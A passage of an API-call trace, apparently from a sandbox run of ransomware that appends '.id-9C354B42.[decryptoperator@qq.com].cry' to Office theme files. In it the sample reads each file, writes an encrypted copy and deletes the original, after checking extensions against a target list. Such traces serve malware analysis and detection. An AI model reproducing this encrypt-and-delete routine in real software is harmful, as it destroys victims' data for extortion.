SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0043.660] GetLastError () returned 0x0 [0043.660] ReadFile (in: hFile=0x164, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x621, lpOverlapped=0x0) returned 1 [0043.744] WriteFile (in: hFile=0x1f0, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x630, lpOverlapped=0x0) returned 1 [0043.745] ReadFile (in: hFile=0x164, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.745] WriteFile (in: hFile=0x1f0, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.745] SetEndOfFile (hFile=0x1f0) returned 1 [0043.745] CloseHandle (hObject=0x1f0) returned 1 [0043.745] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.745] SetEndOfFile (hFile=0x164) returned 1 [0043.746] CloseHandle (hObject=0x164) returned 1 [0043.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.747] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".doc") returned 4 [0043.901] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.901] lstrlenW (lpString=".docx") returned 5 [0043.901] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.901] lstrlenW (lpString=".pdf") returned 4 [0043.901] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString=".xls") returned 4 [0043.901] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString=".xlsx") returned 5 [0043.901] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.901] lstrlenW (lpString=".ppt") returned 4 [0043.901] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".zip") returned 4 [0043.901] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString=".rar") returned 4 [0043.901] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString=".bz2") returned 4 [0043.901] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.901] lstrlenW (lpString=".7z") returned 3 [0043.901] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".dbf") returned 4 [0043.901] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".1cd") returned 4 [0043.901] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".jpg") returned 4 [0043.901] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.901] lstrlenW (lpString=".doc") returned 4 [0043.901] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.902] lstrlenW (lpString=".docx") returned 5 [0043.902] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.902] lstrlenW (lpString=".pdf") returned 4 [0043.902] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.902] lstrlenW (lpString=".xls") returned 4 [0043.902] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.902] lstrlenW (lpString=".xlsx") returned 5 [0043.902] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.902] lstrlenW (lpString=".ppt") returned 4 [0043.902] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.902] lstrlenW (lpString=".zip") returned 4 [0043.902] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.902] lstrlenW (lpString=".rar") returned 4 [0043.902] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.902] lstrlenW (lpString=".bz2") returned 4 [0043.902] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.902] lstrlenW (lpString=".7z") returned 3 [0043.902] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.902] lstrlenW (lpString=".dbf") returned 4 [0043.902] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.902] lstrlenW (lpString=".1cd") returned 4 [0043.902] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0043.902] lstrlenW (lpString=".jpg") returned 4 [0043.902] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.902] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0043.902] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.903] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2848) returned 1 [0043.903] CloseHandle (hObject=0x190) returned 1 [0043.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 0x20 [0043.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.903] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.903] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0043.905] GetLastError () returned 0x0 [0043.905] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xb20, lpOverlapped=0x0) returned 1 [0043.939] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xb30, lpOverlapped=0x0) returned 1 [0043.940] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.940] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.940] SetEndOfFile (hFile=0x1f4) returned 1 [0043.940] CloseHandle (hObject=0x1f4) returned 1 [0043.940] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.940] SetEndOfFile (hFile=0x190) returned 1 [0043.941] CloseHandle (hObject=0x190) returned 1 [0043.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.941] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".doc") returned 4 [0043.942] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.942] lstrlenW (lpString=".docx") returned 5 [0043.942] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.942] lstrlenW (lpString=".pdf") returned 4 [0043.942] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString=".xls") returned 4 [0043.942] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString=".xlsx") returned 5 [0043.942] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.942] lstrlenW (lpString=".ppt") returned 4 [0043.942] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".zip") returned 4 [0043.942] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString=".rar") returned 4 [0043.942] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString=".bz2") returned 4 [0043.942] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.942] lstrlenW (lpString=".7z") returned 3 [0043.942] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".dbf") returned 4 [0043.942] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".1cd") returned 4 [0043.942] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".jpg") returned 4 [0043.942] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.942] lstrlenW (lpString=".doc") returned 4 [0043.942] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.943] lstrlenW (lpString=".docx") returned 5 [0043.943] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.943] lstrlenW (lpString=".pdf") returned 4 [0043.943] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.943] lstrlenW (lpString=".xls") returned 4 [0043.943] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.943] lstrlenW (lpString=".xlsx") returned 5 [0043.943] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.943] lstrlenW (lpString=".ppt") returned 4 [0043.943] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.943] lstrlenW (lpString=".zip") returned 4 [0043.943] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.943] lstrlenW (lpString=".rar") returned 4 [0043.943] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.943] lstrlenW (lpString=".bz2") returned 4 [0043.943] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.943] lstrlenW (lpString=".7z") returned 3 [0043.943] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.943] lstrlenW (lpString=".dbf") returned 4 [0043.943] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.943] lstrlenW (lpString=".1cd") returned 4 [0043.943] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.943] lstrlenW (lpString=".jpg") returned 4 [0043.943] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.943] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0043.943] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.944] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=20627) returned 1 [0043.944] CloseHandle (hObject=0x190) returned 1 [0043.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20 [0043.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.945] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.945] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0043.945] GetLastError () returned 0x0 [0043.945] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x5093, lpOverlapped=0x0) returned 1 [0044.003] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x50a0, lpOverlapped=0x0) returned 1 [0044.004] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.004] WriteFile (in: hFile=0x1f4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.004] SetEndOfFile (hFile=0x1f4) returned 1 [0044.004] CloseHandle (hObject=0x1f4) returned 1 [0044.004] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.004] SetEndOfFile (hFile=0x190) returned 1 [0044.005] CloseHandle (hObject=0x190) returned 1 [0044.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.005] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0044.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.006] lstrlenW (lpString=".doc") returned 4 [0044.006] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.006] lstrlenW (lpString=".docx") returned 5 [0044.006] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.006] lstrlenW (lpString=".pdf") returned 4 [0044.006] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.006] lstrlenW (lpString=".xls") returned 4 [0044.006] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.006] lstrlenW (lpString=".xlsx") returned 5 [0044.006] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.006] lstrlenW (lpString=".ppt") returned 4 [0044.006] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.006] lstrlenW (lpString=".zip") returned 4 [0044.006] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.006] lstrlenW (lpString=".rar") returned 4 [0044.006] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.006] lstrlenW (lpString=".bz2") returned 4 [0044.006] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.006] lstrlenW (lpString=".7z") returned 3 [0044.006] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.006] lstrlenW (lpString=".dbf") returned 4 [0044.006] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".1cd") returned 4 [0044.007] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".jpg") returned 4 [0044.007] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".doc") returned 4 [0044.007] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString=".docx") returned 5 [0044.007] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.007] lstrlenW (lpString=".pdf") returned 4 [0044.007] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString=".xls") returned 4 [0044.007] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.007] lstrlenW (lpString=".xlsx") returned 5 [0044.007] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.007] lstrlenW (lpString=".ppt") returned 4 [0044.007] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".zip") returned 4 [0044.007] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.007] lstrlenW (lpString=".rar") returned 4 [0044.007] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.007] lstrlenW (lpString=".bz2") returned 4 [0044.007] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString=".7z") returned 3 [0044.007] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".dbf") returned 4 [0044.007] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".1cd") returned 4 [0044.007] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.007] lstrlenW (lpString=".jpg") returned 4 [0044.008] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.008] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.008] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.008] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1925) returned 1 [0044.008] CloseHandle (hObject=0x190) returned 1 [0044.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20 [0044.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.008] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.008] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 